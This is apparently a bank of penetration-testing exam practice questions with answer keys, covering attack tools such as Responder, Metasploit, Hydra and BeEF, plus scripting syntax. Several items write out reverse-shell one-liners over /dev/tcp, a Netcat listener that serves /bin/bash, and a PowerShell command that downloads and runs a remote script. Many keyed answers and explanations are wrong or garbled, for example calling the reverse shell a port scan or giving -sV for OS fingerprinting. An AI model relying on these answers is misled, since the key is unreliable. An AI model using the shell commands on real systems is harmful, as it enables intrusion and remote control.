Which mobile tool provides an attack framework that can be used to exploit mobile devices running the Android operating system?
A.APKX
B.APK Studio
C.Drozer
D.DAST
C.Drozer
Explanation:
The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.
Which mobile tool can be used to reverse engineer an APK file from a mobile device running the Android operating system?
A.Peach
B.APK Studio
C.Drozer
D.DAST
B.APK Studio
Explanation:
APK Studio is a tool that you can use to reverse engineer an APK executable and analyze it for vulnerabilities.
Which mobile tool is a Python wrapper that can extract Java source code directly from an Android APK executable?
A.APKX
B.AFL
C.Drozer
D.DAST
A.APKX
Explanation:
Android APK Decompilation for the Lazy (APKX) is a Python wrapper that can extract Java source code directly from an Android APK executable.
Which penetration testing tool is a command-line search tool for the online Exploit-DB database of known exploits?
A.findbugs
B.Shodan
C.Censys
D.Searchsploit
D.Searchsploit
Explanation:
The searchsploit utility is a command-line search tool that is used to query the online Exploit-DB database for known exploits.
During a gray box penetration test, the tester wants to poison queries for the target organization’s domain controller in order to redirect client requests to the tester’s laptop and capture usernames and hashed passwords. Which utility could be used to do this?
A.Searchsploit
B.Empire
C.Impacket
D.Responder
D.Responder
Explanation:
The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.
Which penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB?
A.Searchsploit
B.Empire
C.Impacket
D.Responder
C.Impacket
Explanation:
The impacket penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB and MSRPC protocols.
Which penetration testing tool provides penetration testers with a huge number of exploits that can be used to compromise the target organization’s network?
A.Metasploit Framework
B.SET
C.hping
D.ncat
A.Metasploit Framework
Explanation:
The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization’s network.
While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: ServerName = FS1 Which type of script could this be? (Choose two.)
A.PowerShell
B.Bash
C.Ruby
D.Python
B.Bash
D.Python
Explanation:
When declaring a variable, both Bash and Python use the same syntax: variable_name = value
While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: $ServerName = FS1 Which type of script could this be? (Choose two.)
A.PowerShell
B.Bash
C.Ruby
D.Python
A.PowerShell
C.Ruby
Explanation:
When declaring a variable, PowerShell uses a syntax of $variable_name = value.
Ruby uses the same syntax when declaring a global variable.
While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax:
_ServerName = FS1 Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
C.Ruby
Explanation:
When declaring a local variable, Ruby uses a syntax of _variable_name = value.
While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax:
PrimeNumArray = [2, 3, 5, 7, 11]
Which type of script could this be? (Choose two.)
A.PowerShell
B.Bash
C.Ruby
D.Python
C.Ruby
D.Python
Explanation:
When declaring an array, both Ruby and Python use the same syntax: array_name = [value1, value2, value3, …].
While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax:
PrimeNumArray = (2, 3, 5, 7, 11) Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
B.Bash
Explanation:
When declaring an array, Bash uses the following syntax: array_name = (value1, value2, value3, …).
While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax:
$PrimeNumArray = @(2, 3, 5, 7, 11) Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
A.PowerShell
Explanation:
When declaring an array, PowerShell uses the following syntax: $array_name = @(value1, value2, value3, …).
While reading an executable script file, you see a line near the beginning of the script that references the value of a variable using the following syntax:
echo {$ServerName}
Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
B.Bash
Explanation:
When referencing the value of a variable, Bash uses the following syntax: {$variable_name}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.
While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: echo {$PrimeNumArray[2]} Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
B.Bash
Explanation:
When referencing a value from an array, Bash uses the following syntax: {$array_name[position]}. In this
example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.
While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax:
echo $PrimeNumArray[2]
Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
A.PowerShell
Explanation:
When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.
While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax:
print (PrimeNumArray[2])
Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
D.Python
Explanation:
When referencing a value from an array, Python uses the following syntax: (array_name[position]). In this example, the print command is being told to print the second value of the array named PrimeNumArray
While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: puts PrimeNumArray[2] Which type of script could this be?
A.PowerShell
B.Bash
C.Ruby
D.Python
C.Ruby
Explanation:
When referencing a value from an array, Ruby uses the following syntax: array_name[position]. In this example, the puts command is being told to use the second value of the array named PrimeNumArray.
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
A.Target[HostName] = FS1
B.Target = [{“HostName”:”FS1”}]
C.$Target.HostName = ‘FS1’
D. _Target = {“HostName” => “FS1”}
A.Target[HostName] = FS1
Explanation:
When creating an associative array in a Bash script, you use the following syntax: array_name[element_name] = value.
In this example, the line Target[HostName] = FS1 assigns a value of FS1 to the element named HostName within the Target array.
As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
A.Target[HostName] = FS1
B.Target = [{"HostName":"FS1"}]
C.$Target.HostName = 'FS1'
D._Target = {"HostName" => "FS1"}
D._Target = {“HostName” => “FS1”}
Explanation:
When creating an associative array in a Ruby script, you use the following syntax: _array_name = {“element_name” => “value”} . In this example, the line _Target = {“HostName” => “FS1”} assigns a value of FS1 to the element named HostName within the Target array.
As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
A.Target[HostName] = FS1
B.Target = [{"HostName":"FS1"}]
C.$Target.HostName = 'FS1'
D._Target = {"HostName" => "FS1"}
C.$Target.HostName = ‘FS1’
Explanation:
When creating an associative array in a PowerShell script, you use the following syntax: $array_name.element_name = “value” . In this example, the line $Target.HostName = ‘FS1’ assigns a value of FS1 to the element named HostName within the Target array.
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
A.Target[HostName] = FS1
B.Target = [{"HostName":"FS1"}]
C.$Target.HostName = 'FS1'
D._Target = {"HostName" => "FS1"}
B.Target = [{“HostName”:”FS1”}]
Explanation:
When creating an associative array in a PowerShell script, you use the following syntax: array_name = [{“element_name”:”value”}].
In this example, the line Target = [{“HostName”:”FS1”}] assigns a value of FS1 to the element named HostName within the Target array.
As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
A.=
B.==
C.-eq
D.!=
B.==
Explanation:
When making a comparison between two values in a Ruby script to see whether they are equal, you use the == relational operator.
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables that tests whether they are not equal. Which relational operators could you use? (Choose two.)
A.<> B.== C.-eq D.!= E.-ne
A.<>
D.!=
Explanation:
When making a comparison between two values in a Python script to see whether they are not equal, you can use either the <> or the != relational operator.
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
A.=
B.==
C.-eq
D.!=
B.==
Explanation:
When making a comparison between two values in a Python script to see whether they are equal, you use the == relational operator.
As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
A.=
B.==
C.-eq
D.!=
C.-eq
Explanation:
When making a comparison between two values in a PowerShell script to see if they are equal, you use the -eq relational operator.
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two integer variables to test whether one is numerically greater than the other. Which relational operator should you use?
A.>
B.<
C.-gt
D. !>
C.-gt
Explanation:
When making a comparison between two integer values in a Bash script to see whether one is greater than the other, you use the -gt relational operator.
Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other?
A.>
B.<
C>-gt
D.!>
A.>
Explanation:
The > relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other.
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other?
A.>=
B.-gt
C.-ge
D.!>=
C.-ge
Explanation:
The -ge relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other.
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other?
A.>=
B.-gt
C.-ge
D.!>=
B.-gt
Explanation:
The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.
Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other?
A.>=
B.-gt
C.-ge
D.!>=
A.>=
Explanation:
The >= relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other.
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other?
A.<=
B.-lt
C.-le
D.!
B.-lt
Explanation:
The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.
Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other?
A.<=
B.-lt
C.-le
D.
D.<
Explanation:
The < relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other.
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other?
A.<=
B.-lt
C.-le
D.!
C.-le
Explanation:
The -le relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other.
Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other?
A.<=
B.-lt
C.-le
D.!
A.<=
Explanation:
The <= relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other.
You need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
A.echo $TargetHost
B.read TargetHost
C.readln TargetHost
D.input $TargetHost
B.read TargetHost
Explanation:
Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to display the value of a variable named TargetHost on the screen. Which command will do this?
A.echo $TargetHost
B.write TargetHost
C.writeln TargetHost
D.output $TargetHost
A.echo $TargetHost
Explanation:
Adding the echo $TargetHost line to a Bash script causes it to display the value of a variable named TargetHost on the screen.
Which command can be used from within an if/then flow control structure in a Bash script to evaluate whether a specified condition is true?
A.eval
B.==
C.test
D.<>
C.test
Explanation:
The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true.
Consider the following snippet from a script:
if _x > 2
puts "x is greater than 2"
else
puts "x is less than or equal to 2"
end
What scripting language is this snippet written in?
A.Ruby
B.PowerShell
C.Bash
D.Python
A.Ruby
Explanation:
An if/then flow control structure in Ruby uses the following syntax: if condition commands… else commands… end
Consider the following snippet from a script:
If (x -eq 2) {
‘This number is 2’
} Else {
‘This number is not 2’ }
What scripting language is this snippet written in?
A.Ruby
B.PowerShell
C.Bash
D.Python
B.PowerShell
Explanation:
An if/then flow control structure in PowerShell uses the following syntax:
if condition {
commands…
} Else { commands…
}
Consider the following snippet from a script:
if test -f $FileName; then
echo "The file exists."
else
echo "The file does not exist."
fi
What scripting language is this snippet written in?
A.Ruby
B.PowerShell
C.Bash
D.Python
C.Bash
Explanation:
An if/then flow control structure in Bash uses the following syntax:
if condition then commands... else commands... fi
In a Bash script, you need to prompt the user to select from one of seven different options presented with the echo command. Which control structure would best evaluate the user’s input and run the appropriate set of commands?
A.while loop B.for loop C.until loop D.if/then/else E.case
E.case
Explanation:
The case structure is the best option presented to evaluate the user’s choice of multiple selections and run the appropriate set of commands as a result.
Which control structure will keep processing over and over until a specified condition evaluates to false?
A.while loop B.for loop C.until loop D.if/then/else E.case
A.while loop
Explanation:
A while loop will keep processing over and over until the specified condition evaluates to false.
Which control structure is considered to be a flow control structure?
A.while loop
B.for loop
C.until loop
D.if/then/else
D.if/then/else
Explanation:
The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates.
Which control structure will keep processing over and over as long as the specified condition evaluates to false?
A.while loop
B.for loop
C.until loop
D.if/then/else
C.until loop
Explanation:
The until looping structure will keep processing over and over as long as the specified condition evaluates to false.
Which control structure will process a specified number of times?
A.while loop B.for loop C.until loop D.if/then/else E.case
B.for loop
Explanation:
The for looping structure will process a specified number of times.
You need to create a PowerShell script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
A.TargetHost = input(‘Please enter a hostname:’)
B.read TargetHost
C.TargetHost = gets
D.$TargetHost = read-host -Prompt
D.$TargetHost = read-host -Prompt
Explanation:
Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.
Which command in a PowerShell script will cause it to write the value of a variable named TargetHost on the screen?
A.echo $TargetHost
B.print (TargetHost)
C.writeln TargetHost
D.puts TargetHost
A.echo $TargetHost
Explanation:
Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.
You need to create a Ruby script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
A.TargetHost = input(‘Please enter a hostname:’)
B.read TargetHost
C.TargetHost = gets
D.$TargetHost = read-host -Prompt
C.TargetHost = gets
Explanation:
Adding the TargetHost = gets line to a Ruby script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.
Which command in a Ruby script will cause it to write the value of a variable named TargetHost on the screen?
A.echo $TargetHost
B.print (TargetHost)
C.writeln TargetHost
D.puts TargetHost
D.puts TargetHost
Explanation:
Adding the puts TargetHost line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.
You need to create a Python script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
A.TargetHost = input(‘Please enter a hostname:’)
B.read TargetHost
C.TargetHost = gets
D.$TargetHost = read-host -Prompt
A.TargetHost = input(‘Please enter a hostname:’)
Explanation:
Adding the TargetHost = input(‘Please enter a hostname:’) line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.
Which command in a Python script will cause it to write the value of a variable named TargetHost on the screen?
A.echo $TargetHost
B.print (TargetHost)
C.writeln TargetHost
D.puts TargetHost
B.print (TargetHost)
Explanation:
Adding the print (TargetHost) line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.
Which of the following elements must be included at the beginning of every Bash script?
A.#Comment
B.#!/bin/bash
C.exit 0
D.#begin script
B.#!/bin/bash
Explanation:
The #!/bin/bash element must be included at the beginning of every Bash shell script.
You’ve created a Bash script in your home directory on a Linux system named myexploit. How can you execute it? (Choose two.)
A.Enter /bin/bash ~/myexploit at the shell prompt.
B.Enter myexploit at the shell prompt.
C.Select Computer ➢ Run in the graphical desktop; then enter ~/ myexploit and select Run.
D.Enter run ~/ myexploit at the shell prompt.
E.Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.
A.Enter /bin/bash ~/myexploit at the shell prompt.
E.Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.
Explanation:
E.Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.
Which Bash script command will create a new variable named TOTAL and set its type to be integer?
A.variable –i TOTAL
B.declare –i TOTAL
C.declare TOTAL –t integer
D.TOTAL=integer
B.declare –i TOTAL
Explanation:
The declare –i TOTAL command will create the TOTAL variable and type it as integer.
Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this?
A.tail /var/log/firewall 1> lastevents 2> lastevents
B.tail /var/log/firewall > lastevents
C.tail /var/log/firewall 1> lastevents 2> &1
D.tail /var/log/firewall 1&2> lastevents
C.tail /var/log/firewall 1> lastevents 2> &1
Explanation:
Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a bash script will send both stdout and stout and stderr to the same file
A penetration tester wants to target the NetBIOS name service.
Which command is most likely to be used to exploit the NetBIOS name service?
A.arpspoof
B.burpsuite
C.nmap
D.responder
D.Responder
Explanation:
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network.
Responder is a powerful tool when exploiting NetBIOS responses.
It can target individual systems or entire local networks, allows you to ananlyze or response to NetBIOS name services pretending to be the system that the query is intended forD
A penetration tester wants to conduct open-source intelliegence (OSINT) data collection from publicly available resources.
Which of the following tools can be used? (Choose Two)
A.BeEF B.Dynamo C.Maltego D.SET E.Shodan F.Wireshark
C.Maltego
E.Shodan
Explanation:
There are a variety of tools that assist with this OSINT collection:
Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine
Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.
Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.
nslookup tools help identify the IP addresses associated with an organization.
Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.
Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.
theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. whois tools gather information from public records about domain ownership.
A penetration tester wants to perform a credential brute-force attack on a client’s application. Which of the following tools should be used?
A.Hashcat
B.Hydra
C.John the Ripper
D.Peach
B.Hydra
Explanation:
In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.
A penetration tester is trying to attack a device with a user account that was previously identified. What type of attack is being tested?
A.Credential dump
B.DLL injection
C.Pass the hash
D.Reverse shell
C.Pass the hash
Explanation: In this scenario, the tester is using the Metasploit PSEXEC module. Using Metasploit, a tester can exploit a system and perform a hash dump to extract the systems hashes. The tester can then use the PSEXEC module to pass the hash to another system on the network. The example shows how the SMBPASS option is set and the pass-the-hash attack executed, resulting in access to a remote system within the network. A pass-the-hash attack is an exploit in which a tester takes a hashed user credential and, without cracking it, reuses it to deceive an authentication system into creating a new authenticated session on the same network.
A penetration tester wants to use Metasploit. Which of the following commands will start the Metasploit database?
A.db_connect
B.db_init
C.msfconsole
D.msfvenom
C.msfconsole
Explanation:
Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploit-framework/msfconsole directory
You are a penetration tester, and you want to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack. Which tool does not allow you to capture NTLM v2 hashes over the wire?
A.Ettercap
B.Mimikatz
C.Metasploit
D.Responder
B.Mimikatz
Explanation:
Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket attacks. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.
A penetration tester is conducting a test and gains access into an unrestricted system network by using port 443. The tester wants to create a reverse shell from the client back to the tester. Which of the following methods is most likely what the tester will use?
A.bash -i >& /dev/tcp//443 0>&1
B.nc -e /bin/sh 443
C.perl -e ‘use SOCKET’; $i=’; $p=’443;
D.ssh superadmin@ -p 443
A.bash -i >& /dev/tcp//443 0>&1
Explanation:
A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following: bash -i >& /dev/tcp//443 0>&1 Given the options, A is the best option. B and C will not work because they are using the and not the . Option D is not correct because it is using the improper syntax.
During a penetration test, the following line of code was found in an exploited machine’s history file:
bin/bash -i >& /dev/tcp/192.168.0.10/80 0> &1
What best describes what this command line does?
A.A port scan has been performed.
B.Obtains the web server’s banner.
C.Redirects a teletypewriter (TTY) to a remote system.
D.Removes the error logs for the given IP.
A.A port scan has been performed.
Explanation:
In bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP
connection to the corresponding socket. So, in this example, a port scan has been performed. Here’s a breakdown of the code: /bin/bash -i invokes an interactive bash shell. > &/dev/tcp// pipes that shell to the tester. 0&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2>).
A tester has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, the tester doesn’t know which systems on the network may accept the hash. What tool should the tester use to conduct the test?
A.Drozer
B.Hashcat
C.Hydra
D.Kismet
C.Hydra
Explanation:
Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.
A tester using penetration testing wants to deploy a malicious website at part of the test to exploit the browsers belonging to the client’s employees. What tool can the test utilize?
A.Browser Exploitation Framework (BeEF)
B.Metasploit
C.Open Web Application Security Project (OWASP) D.Social Engineer Toolkit (SET)
A.Browser Exploitation Framework (BeEF)
Explanation:
The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.
You are a penetration tester, and you are planning to create a custom wordlist of common words and catchphrases about your client using the client’s website. What is the name of the tool that you can utilize to assist with building a custom wordlist?
A.CeWL
B.Hashcat
C.Hydra
D.Medusa
A.CeWL
Explanation:
Custom Word List (CeWL) Generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.
A penetration tester is using PowerShell to conduct testing. The tester is using the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1”);Invoke-Command
What action is being performed by this command?
A.It executes a remote script.
B.It incorporates an object.
C.It runs an encoded command.
D.It sets the execution policy.
A.It executes a remote script.
Explanation:
In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.
You are a penetration tester and have run the following Nmap scan on a computer: nmap -sV 192.168.10.5. The client indicated that it had disabled Telnet from its environment. However, the Nmap scan results show that port 22 is closed and that port 23 is open to SSH. What might have happened to cause this?
A.The organization did not disable Telnet.
B.The nmap results contain a false positive for port 23.
C.The service is running on a nonstandard port.
D.Port 22 is filtered.
A.The organization did not disable Telnet.
Explanation: Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.
You are a penetration tester, and you plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see when you use this script: hping remoteclient.com -S -V -p 80?
A.HTTP traffic to TCP port 80
B.HTTPS traffic to TCP port 80
C.TCP SYNs to TCP port 80
D.TCP three-way handshake to TCP port 80
C.TCP SYNs to TCP port 80
Explanation:
Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.
A penetration tester is conducting a test and has compromised the client’s host. What is the correct syntax to create a Netcat listener on this device?
A.nc -lp 4444 -e /bin/bash
B.nc -lvp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -vp 4444 /bin/bash
A.nc -lp 4444 -e /bin/bash
Explanation:
Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments: -l: Listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs
Which nmap switch must a penetration tester use if they want to scan all the TCP ports on an identified device?
A.-p- 1-65535
B.-p ALX
C.-p 1-65544
D.-port 1-65534
A.-p- 1-65535
Explanation:
nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. nmap is a port scanner. To scan for ports, you will want to use -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (e.g., 1-1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.
A penetration tester wants to perform passive reconnaissance on the client’s external domain. What would be the best choice to use?
A.CeWL
B.OpenVAS
C.Peach
D.Shodan
D.Shodan
Explanation:
Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.
A penetration tester has successfully exploited a DM2 server that seems to be listening to an outbound port. The tester wants to forward that traffic back to a device. What are the best tools to do this? (Choose two.)
A.Cain and Abel B.Netcat C.Nmap D.Secure Shell (SSH) E.Tcpdump F.Wireshark
D.Secure Shell (SSH)
F.Wireshark
Explanation:
In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22,
and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.
A penetration tester is analyzing a script to determine why the script is not returning the correct results as expected. The expected results should be True.
root:~# cat ./myscript.sh
#!/bin/bash
source=10
let dest=5+5
if [ 'source' = 'dest' ]; then
echo "True"
else
echo "False"
fi
#End of File
root:~# ./myscript.sh
False
By reviewing the script, how would the tester correct the errors to return the correct results? (Choose two.)
A.Change fi' to 'Endlf B.Remove let in front of dest=5+5 C.Change the = to -eq D.Change -source* and 'dest' to "Ssource" and "Sdest" E.Change 'else' to 'elif
B.Remove let in front of dest=5+5
C.Change the = to -eq
Explanation:
Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to an = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.
You are a penetration tester and want to create an array using a PowerShell script. Which lines of code would you use?
A.$ports = 20, 25, 80, 443 B.ports = (20,25,80,443) C.ports = [20,25,80,443] D.$ports= [20,25,80,443]
A.$ports = 20, 25, 80, 443
Explanation:
PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it’s for setting, changing, or retrieving the value stored in that variable.
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which additional command would need to be executed on the tester’s Linux system to make the previous command work?
A.nc -nvlp 443
B.nc 10.2.4.6 443
C.nc -w3 10.2.4.6 443
D.nc-/bin/ah 10.2.4.6 443
A.nc -nvlp 443
Explanation:
The tester will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, the tester is telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).
During an internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. A tester wants to impersonate network resources and collect authentication requests. What tool should be used?
A.Ettercap
B.Medusa
C.Tcpdump
D.Responder
D.Responder
Explanation:
In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.
A penetration tester, using nmap, has been asked to conduct OS fingerprinting using a company-provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.)
A.-iL B.-O C.-oN D.-oX E.-sS F.-sV
A.-iL
F.-sV
Explanation:
One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version info.
A penetration tester is using Metasploit. What command would allow the tester to access a private network from the Internet?
A.db_nmp -iL /tmp/privatentwk.txt
B.run autoroute -a 192.168.1.10/24
C.set rhost 192.168.1.10
D.use auxiliary/server/socks4a
D.use auxiliary/server/socks4a
